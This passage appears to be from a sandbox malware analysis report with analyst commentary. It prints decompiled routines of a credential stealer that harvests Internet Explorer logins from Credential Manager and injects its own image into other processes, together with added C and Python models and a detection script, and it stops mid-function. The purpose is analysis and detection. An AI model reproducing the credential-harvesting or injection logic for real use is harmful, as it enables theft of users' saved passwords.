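Both decompiled records above (the one starting at 0x0040930b and the one at 0x0040930c) are the same credential-harvesting routine, E0040930C. Reading the two API calls against the stack variables: CredEnumerateA is called with a NULL filter and flags 0, so every entry in the caller's Credential Manager is returned into _v8 with the count in _v12. For each CREDENTIALA the sample reads CredentialBlobSize (offset 0x18) into _v20 and CredentialBlob (offset 0x1c) into _v16, which together form the DATA_BLOB passed as pDataIn; TargetName (offset 8) becomes the "Address: " line. The optional-entropy blob is _v36/_v32: cbData 0x4a and a pointer to the 36-character GUID string "abe2869f-9b47-4cd9-a358-c22904dba7f7", which the code copies onto the stack (9 dwords plus one movsb, 37 bytes with the terminator) and then widens to UTF-16 in the 0x25-iteration loop, giving 37 code units = 74 = 0x4a bytes. That GUID is the well-known entropy value Internet Explorer 7 and later use for WinInet credentials kept in the credential store, so this routine recovers IE-stored web logins. The decrypted plaintext is then split with a Pos()/Copy() pair into the "User: " and "Password: " lines.

The following C is an added analyst's model of that data handling, not the sample's code or a Joe Sandbox artifact. It reproduces the entropy-blob construction and the plaintext split portably so the constants can be checked without Windows; the Win32 calls themselves are not made. Two things are assumptions: the separator character the sample searches for (the string at 0x4096bc is not visible in this excerpt, so it is a parameter), and the plaintext buffer, which is constructed here and is not real credential data.

```c
/* Added example: portable model of E0040930C's data handling (not the sample's code). */
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Mirror of the Win32 DATA_BLOB layout: cbData at the lower address, then pbData.
   This is how the stack pairs _v20/_v16 (pDataIn) and _v36/_v32 (pOptionalEntropy) read. */
typedef struct {
    uint32_t cbData;
    uint8_t *pbData;
} data_blob_t;

/* GUID string the sample copies onto the stack: 36 characters plus NUL = 37 bytes. */
static const char ENTROPY_GUID[] = "abe2869f-9b47-4cd9-a358-c22904dba7f7";
#define ENTROPY_CHARS 37u                    /* the 0x25 loop count in the decompile */
#define ENTROPY_BYTES (2u * ENTROPY_CHARS)   /* 0x4a, the value stored in _v36 */

/* Widen the ASCII GUID to UTF-16LE, one code unit per byte including the terminator,
   exactly as the byte loop writing through _t188 does, and wrap it as the entropy blob.
   Returns the blob length, or 0 if the buffer is too small. */
size_t build_entropy_blob(uint8_t *buf, size_t cap, data_blob_t *blob) {
    if (cap < ENTROPY_BYTES) return 0;
    for (size_t i = 0; i < ENTROPY_CHARS; i++) {
        buf[2 * i] = (uint8_t)ENTROPY_GUID[i];
        buf[2 * i + 1] = 0;
    }
    blob->cbData = ENTROPY_BYTES;
    blob->pbData = buf;
    return ENTROPY_BYTES;
}

/* Narrow a UTF-16LE buffer of ASCII-range code units into a NUL-terminated string,
   stopping at an embedded NUL. Non-ASCII code units become '?'. */
static size_t narrow_utf16le(const uint8_t *src, size_t src_len, char *out, size_t out_cap) {
    size_t n = 0;
    for (size_t i = 0; i + 1 < src_len && n + 1 < out_cap; i += 2) {
        uint16_t cu = (uint16_t)(src[i] | (src[i + 1] << 8));
        if (cu == 0) break;
        out[n++] = (cu < 0x80) ? (char)cu : '?';
    }
    out[n] = '\0';
    return n;
}

/* Split a decrypted credential blob at the first `sep` the way the sample's Pos()/Copy()
   sequence does: user = text before it, password = text after it.
   `sep` is an assumption; the separator constant is not visible in the excerpt.
   Returns 1 on success, 0 if no separator is present. */
int split_credential(const data_blob_t *plain, char sep,
                     char *user, size_t user_cap, char *pass, size_t pass_cap) {
    char tmp[512];
    narrow_utf16le(plain->pbData, plain->cbData, tmp, sizeof tmp);
    char *p = strchr(tmp, sep);
    if (p == NULL) return 0;
    *p = '\0';
    snprintf(user, user_cap, "%s", tmp);
    snprintf(pass, pass_cap, "%s", p + 1);
    return 1;
}

int main(void) {
    uint8_t ebuf[ENTROPY_BYTES];
    data_blob_t entropy;
    build_entropy_blob(ebuf, sizeof ebuf, &entropy);
    printf("entropy cbData = 0x%02x\n", (unsigned)entropy.cbData);

    /* Constructed stand-in for a CryptUnprotectData output ("alice:hunter2" as UTF-16LE);
       no real credential store is read. */
    uint8_t plaintext[] = { 'a',0,'l',0,'i',0,'c',0,'e',0, ':',0,
                            'h',0,'u',0,'n',0,'t',0,'e',0,'r',0,'2',0 };
    data_blob_t out = { (uint32_t)sizeof plaintext, plaintext };
    char user[64], pass[64];
    if (split_credential(&out, ':', user, sizeof user, pass, sizeof pass))
        printf("User: %s\nPassword: %s\n", user, pass);
    return 0;
}
```

For detection work the useful takeaways are the pairing of CredEnumerate with CryptUnprotectData in the same routine and the 74-byte entropy blob built from that GUID; the string itself survives in the dump (see the String ID above) and is a stable hunting indicator across credential-stealer families that target IE-stored logins.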

                                    C-Code - Quality: 57%
                                    			E00408AD5(signed int* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, signed int __esi, char _a1, signed int _a73) {
                                    				long* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				char _v44;
                                    				signed char _t43;
                                    				long* _t50;
                                    				intOrPtr _t66;
                                    				intOrPtr _t71;
                                    				void* _t76;
                                    				void* _t94;
                                    				intOrPtr _t103;
                                    				intOrPtr _t104;
                                    				signed char _t112;
                                    				void* _t113;
                                    				signed int _t115;
                                    				void* _t116;
                                    				char* _t117;
                                    				void* _t119;
                                    
                                    				asm("adc [edx], eax");
                                    				_t43 =  *__eax ^  *[cs:ecx];
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *__ecx =  *__ecx + __edx;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				asm("adc [eax], al");
                                    				_t115 = __esi | _a73;
                                    				_t117 =  &_a1;
                                    				asm("aaa");
                                    				_pop(_t111);
                                    				asm("arpl [gs:edi+0x64], bp");
                                    				_push(_t117);
                                    				_push(_t117);
                                    				_push(_t115);
                                    				_v44 = 0;
                                    				_v32 = 0;
                                    				_v28 = 0;
                                    				_v16 = 0;
                                    				_t116 = __edx;
                                    				_t112 = _t43;
                                    				_push(_t119);
                                    				_push(0x408c74);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t119 + 0xffffffd8;
                                    				_t94 = 0;
                                    				E00401AC0(__edx);
                                    				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8004);
                                    				_t50 = _v8;
                                    				_push(_t50);
                                    				L00408978();
                                    				if(_t50 != 0) {
                                    					_push(0);
                                    					E00402218( &_v28, _t112);
                                    					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
                                    					_push(_t112);
                                    					_t66 = _v12;
                                    					_push(_t66);
                                    					L00408980();
                                    					if(_t66 != 0) {
                                    						_v20 = 0x14;
                                    						_push(0x14);
                                    						E00402FBC();
                                    						_push(0);
                                    						_push( &_v20);
                                    						_push(_v16);
                                    						_push(2);
                                    						_t71 = _v12;
                                    						_push(_t71);
                                    						L00408970();
                                    						if(_t71 != 0) {
                                    							_push(_v12);
                                    							L00408988();
                                    							CryptReleaseContext(_v8, 0);
                                    							_t76 = _v20 - 1;
                                    							if(_t76 >= 0) {
                                    								_v24 = _t76 + 1;
                                    								_t113 = 0;
                                    								do {
                                    									_t94 = _t94 +  *(_v16 + _t113);
                                    									_v40 =  *(_v16 + _t113) & 0x000000ff;
                                    									_v36 = 0;
                                    									E004089C8(0x408c8c, _t94, 0,  &_v40, _t113, _t116,  &_v32);
                                    									E00401D58(_t116, _v32);
                                    									_t113 = _t113 + 1;
                                    									_t30 =  &_v24;
                                    									 *_t30 = _v24 - 1;
                                    								} while ( *_t30 != 0);
                                    							}
                                    							_v40 = 0;
                                    							_v36 = 0;
                                    							E004089C8(0x408c8c, _t94, 0,  &_v40, _t112, _t116,  &_v44);
                                    							E00401D58(_t116, _v44);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t103);
                                    				 *[fs:eax] = _t103;
                                    				_push(E00408C7B);
                                    				E00401AC0( &_v44);
                                    				E00401AC0( &_v32);
                                    				E00402108( &_v28);
                                    				_t104 =  *0x408ad4; // 0x408ad8
                                    				return E00402FC8( &_v16, _t104);
                                    			}
(disassembly listing not captured; only the instruction address column survived, covering 0x00408ad8 to 0x00408c73)

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction ID: d3845163c2b931c13764af6d44d3521470b732fafe65dfe0c77c1fbeb44f725f
                                    • Opcode Fuzzy Hash: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction Fuzzy Hash: 04513070A04249AFDB01EBA5C941BEEBBB8AF09304F5540BFF540F72D1DA7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 61%
                                    			E00408AF8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				long* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				char _v44;
                                    				long* _t47;
                                    				intOrPtr _t63;
                                    				intOrPtr _t68;
                                    				void* _t73;
                                    				void* _t91;
                                    				intOrPtr _t99;
                                    				intOrPtr _t100;
                                    				void* _t108;
                                    				void* _t109;
                                    				void* _t111;
                                    				void* _t114;
                                    
                                    				_v44 = 0;
                                    				_v32 = 0;
                                    				_v28 = 0;
                                    				_v16 = 0;
                                    				_t111 = __edx;
                                    				_t108 = __eax;
                                    				_push(_t114);
                                    				_push(0x408c74);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t114 + 0xffffffd8;
                                    				_t91 = 0;
                                    				E00401AC0(__edx);
                                    				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8004);
                                    				_t47 = _v8;
                                    				_push(_t47);
                                    				L00408978();
                                    				if(_t47 != 0) {
                                    					_push(0);
                                    					E00402218( &_v28, _t108);
                                    					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
                                    					_push(_t108);
                                    					_t63 = _v12;
                                    					_push(_t63);
                                    					L00408980();
                                    					if(_t63 != 0) {
                                    						_v20 = 0x14;
                                    						_push(0x14);
                                    						E00402FBC();
                                    						_push(0);
                                    						_push( &_v20);
                                    						_push(_v16);
                                    						_push(2);
                                    						_t68 = _v12;
                                    						_push(_t68);
                                    						L00408970();
                                    						if(_t68 != 0) {
                                    							_push(_v12);
                                    							L00408988();
                                    							CryptReleaseContext(_v8, 0);
                                    							_t73 = _v20 - 1;
                                    							if(_t73 >= 0) {
                                    								_v24 = _t73 + 1;
                                    								_t109 = 0;
                                    								do {
                                    									_t91 = _t91 +  *(_v16 + _t109);
                                    									_v40 =  *(_v16 + _t109) & 0x000000ff;
                                    									_v36 = 0;
                                    									E004089C8(0x408c8c, _t91, 0,  &_v40, _t109, _t111,  &_v32);
                                    									E00401D58(_t111, _v32);
                                    									_t109 = _t109 + 1;
                                    									_t29 =  &_v24;
                                    									 *_t29 = _v24 - 1;
                                    								} while ( *_t29 != 0);
                                    							}
                                    							_v40 = 0;
                                    							_v36 = 0;
                                    							E004089C8(0x408c8c, _t91, 0,  &_v40, _t108, _t111,  &_v44);
                                    							E00401D58(_t111, _v44);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t99);
                                    				 *[fs:eax] = _t99;
                                    				_push(E00408C7B);
                                    				E00401AC0( &_v44);
                                    				E00401AC0( &_v32);
                                    				E00402108( &_v28);
                                    				_t100 =  *0x408ad4; // 0x408ad8
                                    				return E00402FC8( &_v16, _t100);
                                    			}
(disassembly listing not captured; only the instruction address column survived, covering 0x00408b03 to 0x00408c73)

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction ID: 55925fcc99f9e55126638c730d6fbe2105b7814248b5782dab5394ac9007a686
                                    • Opcode Fuzzy Hash: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction Fuzzy Hash: EE412470A442099BDB00EBA5C942BEEB7F8EF48704F54407EF540F72D1DB7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%
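Both E00408AD8 and E00408AF8 above are the same routine: CryptAcquireContextA, CryptCreateHash with algorithm id 0x8004 (CALG_SHA1), CryptHashData over the input string, CryptGetHashParam with parameter 2 (HP_HASHVAL) into a 0x14-byte (20-byte, SHA-1) buffer, then a loop that formats each digest byte with the "%2.2X" string at 0x408c8c via wvsprintfA and appends it to the output string, while also accumulating the bytes into a running sum. The byte count pushed to CryptHashData is 2 * (strlen + 1), twice the ANSI length plus terminator, which is consistent with hashing the UTF-16LE form of the string including its NUL; that is an inference from the decompilation, not something the report states. After the loop one more "%2.2X" call is made with the running sum passed to the helper, but the decompilation does not settle what value is formatted, so the example below returns the sum separately rather than appending it. The following Python is an added example for reproducing the value offline (for instance to recognise the hex string when it turns up in a mutex name, registry value or C2 message); it is not the sample's code and the `wide` switch and function names are the author's own.

```python
import hashlib

# Constants seen in the decompiled routine (advapi32 CryptoAPI).
CALG_SHA1 = 0x8004        # algorithm id passed to CryptCreateHash
HP_HASHVAL = 0x0002       # parameter id passed to CryptGetHashParam
SHA1_DIGEST_LEN = 0x14    # buffer length the routine allocates (20 bytes)
HEX_FORMAT = "%2.2X"      # format string at 0x408c8c, used once per digest byte


def hash_input_bytes(text: str, wide: bool = True) -> bytes:
    """Bytes handed to CryptHashData.

    The binary pushes 2 * (strlen(ansi) + 1) as the length.  Assumption: the
    source buffer is a UTF-16LE (Delphi WideString) and the terminating NUL is
    hashed as well.  wide=False hashes the plain ANSI text with no terminator,
    so an analyst can try both interpretations against an observed value.
    """
    if wide:
        return text.encode("utf-16-le") + b"\x00\x00"
    return text.encode("latin-1")


def sha1_hex_and_sum(text: str, wide: bool = True):
    """Return (upper-case hex of the SHA-1 digest, running byte sum).

    Mirrors the loop in E00408AF8: one "%2.2X" per digest byte appended to the
    output string, and the bytes summed in a 32-bit register on the side.
    """
    digest = hashlib.sha1(hash_input_bytes(text, wide)).digest()
    if len(digest) != SHA1_DIGEST_LEN:
        raise ValueError("unexpected digest length")
    running_sum = 0
    parts = []
    for b in digest:
        running_sum = (running_sum + b) & 0xFFFFFFFF   # 32-bit accumulation
        parts.append(HEX_FORMAT % b)                   # same format as the binary
    return "".join(parts), running_sum


if __name__ == "__main__":
    # Constructed input; not a string recovered from the sample.
    for wide in (True, False):
        hex_digest, byte_sum = sha1_hex_and_sum("abc", wide=wide)
        print("wide=%s %s sum=%d" % (wide, hex_digest, byte_sum))
```

When comparing against a string recovered from memory, check the narrow form first (it is the standard SHA-1 test vector for "abc") and then the wide form; if neither matches, the routine was fed a different string than the one assumed, not a different algorithm, since CALG_SHA1 and the 20-byte buffer fix the hash.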

                                    C-Code - Quality: 76%
                                    			E0040AF08(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
                                    				long _v20;
                                    				long _v24;
                                    				intOrPtr _v28;
                                    				void* _v32;
                                    				_Unknown_base(*)()* _v36;
                                    				void* _t18;
                                    				void* _t30;
                                    				struct HINSTANCE__* _t32;
                                    				void* _t35;
                                    				long _t36;
                                    				void* _t37;
                                    
                                    				_v32 = __ecx;
                                    				_v36 = __edx;
                                    				_t30 = __eax;
                                    				_v28 = 0;
                                    				_t32 = GetModuleHandleA(0);
                                    				_push(0);
                                    				_push(_t32);
                                    				asm("cdq");
                                    				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
                                    				asm("adc edx, [esp+0x4]");
                                    				_t36 =  *(_t18 + 0x50);
                                    				_t35 =  *(_t18 + 0x34);
                                    				VirtualFreeEx(_t30, _t35, 0, 0x8000);
                                    				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40);
                                    				if(_t37 != 0) {
                                    					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24);
                                    					if(_t36 <= _v24) {
                                    						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20);
                                    						CloseHandle(_t30);
                                    						_v32 = _t37;
                                    					}
                                    				}
                                    				return _v28;
                                    			}
(disassembly listing not captured; only the instruction address column survived, covering 0x0040af0f to 0x0040afaf)

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                    • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                    • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
                                    • String ID:
                                    • API String ID: 2398686212-0
                                    • Opcode ID: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction ID: ba714f15e26322d81a3db079e442bf4d00767b5fd8d80c8da630a050ea91888e
                                    • Opcode Fuzzy Hash: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction Fuzzy Hash: D71142B12443007FD210EE698C46F2BBBDCDFC5715F44882EB658E72D1D674E904876A
                                    Uniqueness

                                    Uniqueness Score: -1.00%
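E0040AF08 is the injection primitive behind the "Injects a PE file into a foreign processes" and "Creates a thread in another existing process" signatures. It takes a process handle in eax, calls GetModuleHandleA(0) to get its own image base, follows e_lfanew at offset 0x3c to the NT headers and reads OptionalHeader.ImageBase (NT+0x34) and SizeOfImage (NT+0x50). It then VirtualFreeEx's that address in the target, VirtualAllocEx's the same base with MEM_COMMIT|MEM_RESERVE (0x3000) and PAGE_EXECUTE_READWRITE (0x40), WriteProcessMemory's its whole in-memory image there, checks that SizeOfImage bytes were written, and CreateRemoteThread's the entry passed in edx with the parameter passed in ecx. Because the copy lands at the same ImageBase the original was loaded at, no relocation is needed. The footprint this leaves is a private (not image-mapped) executable region whose first bytes are a PE header claiming that very address as ImageBase, at a base that does not appear in the target's module list. The Python below is an added detection example, not part of the report or the sample: it reads the two header fields at the same offsets the injector uses and flags such regions in a constructed VirtualQueryEx-style walk. Region dictionaries, the `build_pe32_header` test helper and the decision to treat any executable protection (not only 0x40, since the protection may be changed later) as suspect are the author's assumptions.

```python
import struct

# Win32 constants used by the injector (kernel32) and by the check below.
MEM_COMMIT_RESERVE = 0x3000        # VirtualAllocEx allocation type in E0040AF08
PAGE_EXECUTE_READWRITE = 0x40      # VirtualAllocEx protection in E0040AF08
PAGE_EXECUTE_MASK = 0xF0           # PAGE_EXECUTE* protections occupy bits 4..7
MEM_PRIVATE = 0x20000              # MEMORY_BASIC_INFORMATION.Type for VirtualAllocEx'd memory
MEM_IMAGE = 0x1000000              # Type for a normally mapped module
PE32_MAGIC = 0x10B


def pe_image_fields(data: bytes):
    """Read ImageBase and SizeOfImage the way the injector does.

    e_lfanew at 0x3C, then OptionalHeader.ImageBase at NT+0x34 and
    SizeOfImage at NT+0x50 (PE32 layout).  Returns None if the bytes are
    not a PE32 header; PE32+ keeps ImageBase as 8 bytes at NT+0x30, so it
    is deliberately rejected here.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 0x54 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    if struct.unpack_from("<H", data, e_lfanew + 0x18)[0] != PE32_MAGIC:
        return None
    image_base = struct.unpack_from("<I", data, e_lfanew + 0x34)[0]
    size_of_image = struct.unpack_from("<I", data, e_lfanew + 0x50)[0]
    return image_base, size_of_image


def find_injected_images(regions, module_bases):
    """Flag private executable regions that start with a PE header whose
    ImageBase equals the region base and that are not a listed module.

    regions: iterable of dicts {base, protect, type, data}, the shape a
    VirtualQueryEx walk plus ReadProcessMemory of the first page would give.
    module_bases: set of load addresses from the target's module list.
    Returns a list of (base, size_of_image) hits.
    """
    hits = []
    for r in regions:
        if r["type"] != MEM_PRIVATE or (r["protect"] & PAGE_EXECUTE_MASK) == 0:
            continue
        fields = pe_image_fields(r["data"])
        if fields is None:
            continue
        image_base, size_of_image = fields
        if image_base == r["base"] and r["base"] not in module_bases:
            hits.append((r["base"], size_of_image))
    return hits


def build_pe32_header(image_base: int, size_of_image: int) -> bytes:
    """Constructed minimal PE32 header for testing; not a real binary."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, PE32_MAGIC)
    struct.pack_into("<I", opt, 0x1C, image_base)      # -> NT+0x34
    struct.pack_into("<I", opt, 0x38, size_of_image)   # -> NT+0x50
    return dos + b"PE\0\0" + file_header + bytes(opt)


# Constructed sample walk: an injected copy at 0x400000 (the base in the
# report's memory dumps), a legitimately mapped module, and a non-executable
# private page that happens to hold a PE header.
SAMPLE_MODULE_BASES = {0x7FF00000}
SAMPLE_REGIONS = [
    {"base": 0x400000, "protect": PAGE_EXECUTE_READWRITE, "type": MEM_PRIVATE,
     "data": build_pe32_header(0x400000, 0x5A000)},
    {"base": 0x7FF00000, "protect": 0x20, "type": MEM_IMAGE,
     "data": build_pe32_header(0x7FF00000, 0x1000)},
    {"base": 0x600000, "protect": 0x04, "type": MEM_PRIVATE,
     "data": build_pe32_header(0x400000, 0x5A000)},
]


def demo():
    return find_injected_images(SAMPLE_REGIONS, SAMPLE_MODULE_BASES)


if __name__ == "__main__":
    for base, size in demo():
        print("injected image at 0x%08X, SizeOfImage 0x%X" % (base, size))
```

On a live system the same check is the reason tools that walk process memory compare the header's ImageBase with the region base: an image written in place by this routine matches itself, whereas a relocated legitimate DLL normally does not land at its preferred base. The third sample region shows why the executable bit matters for precision; a PE header in read/write memory is common (e.g. a file being read) and should not fire on its own.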

                                    C-Code - Quality: 100%
                                    			E00404460(void* __eax, void* __ecx) {
                                    				struct HINSTANCE__* _t2;
                                    				struct HINSTANCE__* _t4;
                                    				struct HINSTANCE__* _t6;
                                    				void* _t8;
                                    				struct HRSRC__* _t15;
                                    				void* _t16;
                                    				long _t22;
                                    				void* _t24;
                                    
                                    				_t24 = __eax;
                                    				_t2 =  *0x40e670; // 0x400000
                                    				_t15 = FindResourceA(_t2, "XX-XX-XX-XX", 0xa);
                                    				_t4 =  *0x40e670; // 0x400000
                                    				_t22 = SizeofResource(_t4, _t15);
                                    				_t6 =  *0x40e670; // 0x400000
                                    				_t16 = LoadResource(_t6, _t15);
                                    				_t8 = LockResource(_t16);
                                    				_t23 = _t8;
                                    				if(_t8 != 0) {
                                    					E00402074(_t24, _t22 - 1);
                                    					E00403730(E00401F9C(_t24), _t23);
                                    					return FreeResource(_t16);
                                    				}
                                    				return _t8;
                                    			}
(disassembly listing not captured; only the instruction address column survived, covering 0x00404464 to 0x004044c6)

                                    APIs
                                    • FindResourceA.KERNEL32(00400000,XX-XX-XX-XX,0000000A), ref: 00404473
                                    • SizeofResource.KERNEL32(00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000,00000000,00000000), ref: 00404481
                                    • LoadResource.KERNEL32(00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000), ref: 0040448F
                                    • LockResource.KERNEL32(00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 00404497
                                    • FreeResource.KERNEL32(00000000,00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 004044BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindFreeLoadLockSizeof
                                    • String ID: XX-XX-XX-XX
                                    • API String ID: 4159136517-2094075872
                                    • Opcode ID: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction ID: e8a3a0dff3016fb6e66adb29364c5155cbf347710d255ba4738bd85805777bce
                                    • Opcode Fuzzy Hash: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction Fuzzy Hash: 30F05E91B006143BC2507ABB6C81E3B668CAB8575A3840D3AB605FB392D97EDD0143BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E004051CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v264;
                                    				char _v300;
                                    				char _v304;
                                    				char _v308;
                                    				char _v312;
                                    				char _v316;
                                    				void* _t35;
                                    				void* _t53;
                                    				intOrPtr _t54;
                                    				void* _t56;
                                    				void* _t58;
                                    				void* _t61;
                                    
                                    				_t56 = __edi;
